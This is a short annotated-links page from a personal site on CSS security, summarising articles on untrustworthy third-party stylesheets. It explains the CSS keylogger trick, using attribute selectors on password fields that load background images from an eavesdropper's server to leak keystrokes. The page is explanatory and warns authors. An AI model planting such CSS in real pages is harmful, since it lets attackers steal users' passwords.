Glider from the game of Life, rising from the left




Topic: #Cascading-Style-Sheets

More Untrustworthy CSS


Taking off from the controversial keylogger implemented in Cascading Style Sheets, this article surveys the various security holes that Web authors sometimes open up by incautiously borrowing or linking to CSS that they have not inspected and vetted.

“Third Party CSS Is Not Safe”
Jake Archibald, February 27, 2018

#Cascading-Style-Sheets #security #trust

Misusing CSS to Capture Passwords As Users Enter Them


Cascading Style Sheets, considered as a domain-specific language, is powerful enough to enable malicious Web designers to detect and record plaintext entries in text fields of interactive Web pages as users type them in. The key idea is to use selectors like input[type="password"][value$="a"] and specify that the background-image should be loaded from some URL where the eavesdropper has access to the log. The log entry will appear whenever the last character that the user typed into a password field is a lower-case a. By providing ninety-five such selectors, each loading a different background image from the eavesdropper's server, the eavesdropper can check the log to see which images were requested and in what order, and infer the entered password from that list.

“maxchehab”, GitHub, February 20, 2018

#Cascading-Style-Sheets #keylogging #domain-specific-languages

Hashtag index

This work is licensed under a Creative Commons Attribution-ShareAlike License.

Atom feed

John David Stone (

created June 1, 2014 · last revised December 10, 2018